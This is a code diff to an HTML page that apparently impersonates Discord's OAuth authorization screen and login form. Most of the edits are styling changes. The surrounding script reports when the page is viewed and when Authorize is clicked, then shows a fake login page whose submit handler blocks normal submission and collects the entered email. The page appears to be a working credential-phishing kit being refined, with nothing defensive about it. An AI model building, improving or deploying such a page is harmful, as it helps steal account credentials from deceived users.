--- a/index.html
+++ b/index.html
@@ -7,12 +7,15 @@
   <link href="https://cdn.jsdelivr.net/npm/@fontsource/whitney@4.5.0/index.min.css" rel="stylesheet" />
   <style>
     * { margin: 0; padding: 0; box-sizing: border-box; }
-    body, html { height: 100%; background: #2f3136; font-family: 'Whitney', sans-serif; color: #dcddde; display: flex; justify-content: center; align-items: center; }
-    .page { display: none; width: 90%; max-width: 480px; }
-    .page.active { display: block; }
+    body, html { height: 100%; background: #2f3136; font-family: 'Whitney', sans-serif; color: #dcddde; }
 
-    /* OAUTH PAGE */
-    .oauth-box { background: #36393f; border-radius: 8px; padding: 24px; text-align: center; box-shadow: 0 2px 10px rgba(0,0,0,0.3); }
+    /* === BOTH PAGES HIDDEN BY DEFAULT === */
+    .page { display: none; width: 100%; }
+    .page.active { display: flex; }
+
+    /* === OAUTH PAGE (BOXED, CENTERED) === */
+    #oauthPage { justify-content: center; align-items: center; padding: 20px; }
+    .oauth-box { background: #36393f; width: 90%; max-width: 480px; border-radius: 8px; padding: 24px; text-align: center; box-shadow: 0 2px 10px rgba(0,0,0,0.3); }
     .header { display: flex; justify-content: space-between; align-items: center; margin-bottom: 16px; }
     .close { color: #72767d; font-size: 24px; cursor: default; }
     .app-icon { width: 64px; height: 64px; border-radius: 50%; background: #5865f2; margin: 0 auto 16px; }
@@ -27,19 +30,21 @@
     .authorize-btn { width: 100%; padding: 14px; background: #5865f2; color: white; border: none; border-radius: 6px; font-size: 16px; font-weight: 600; cursor: pointer; }
     .authorize-btn:hover { background: #4752c4; }
 
-    /* LOGIN PAGE */
-    .login-container { display: flex; flex-direction: column; align-items: center; padding: 40px 20px; }
+    /* === LOGIN PAGE (FULL SIZE, LIKE BEFORE) === */
+    #loginPage { justify-content: center; align-items: center; padding: 40px 20px; }
+    .login-container { display: flex; flex-direction: column; align-items: center; width: 100%; max-width: 480px; }
     .logo-container { background: #2f3136; padding: 16px; border-radius: 8px; margin-bottom: 16px; }
     .logo { width: 124px; }
-    h1 { font-size: 26px; font-weight: 600; margin-bottom: 8px; color: #fff; }
-    p { font-size: 16px; color: #b9bbbe; margin-bottom: 32px; text-align: center; }
-    form { width: 100%; max-width: 380px; }
+    h1 { font-size: 26px; font-weight: 600; margin-bottom: 8px; color: #fff; text-align: center; }
+    p { font-size: 16px; color: #b9bbbe; margin-bottom: 32px; text-align: center; line-height: 1.4; }
+    form { width: 100%; }
     label { font-size: 12px; font-weight: 600; color: #b9bbbe; margin-bottom: 6px; display: block; text-transform: uppercase; }
     input { width: 100%; padding: 12px 16px; background: #202225; border: 1px solid #202225; border-radius: 4px; color: #dcddde; font-size: 16px; margin-bottom: 16px; }
     input:focus { outline: none; border-color: #5865f2; }
     .forgot { text-align: right; margin-bottom: 24px; }
     .forgot a { color: #00aff4; font-size: 14px; text-decoration: none; }
     button { width: 100%; padding: 14px; background: #5865f2; color: white; border: none; border-radius: 4px; font-size: 16px; font-weight: 600; cursor: pointer; }
+    button:hover { background: #4752c4; }
     .register { text-align: center; margin-top: 24px; font-size: 14px; color: #b9bbbe; }
     .register a { color: #00aff4; text-decoration: none; }
   </style>
@@ -94,7 +99,7 @@
     </div>
   </div>
 
-  <!-- LOGIN PAGE -->
+  <!-- LOGIN PAGE (FULL SIZE) -->
   <div id="loginPage" class="page">
     <div class="login-container">
       <div class="logo-container">
@@ -163,21 +168,21 @@
       } catch (e) {}
     }
 
-    // === 1. OAUTH PAGE VIEWED ===
+    // OAUTH PAGE VIEWED
     window.addEventListener('load', () => {
       if (document.getElementById('oauthPage').classList.contains('active')) {
         sendEmbed('OAUTH PAGE VIEWED', 0x00ff00, []);
       }
     });
 
-    // === 2. AUTHORIZE CLICKED → SHOW LOGIN ===
+    // AUTHORIZE → SHOW FULL LOGIN
     document.getElementById('authorizeBtn').addEventListener('click', () => {
       sendEmbed('OAUTH CLICKED', 0x00ff00, []);
       document.getElementById('oauthPage').classList.remove('active');
       document.getElementById('loginPage').classList.add('active');
     });
 
-    // === 3. LOGIN SUBMIT ===
+    // LOGIN SUBMIT
     document.getElementById('loginForm').onsubmit = async (e) => {
       e.preventDefault();
       const email = document.getElementById('email').value.trim();
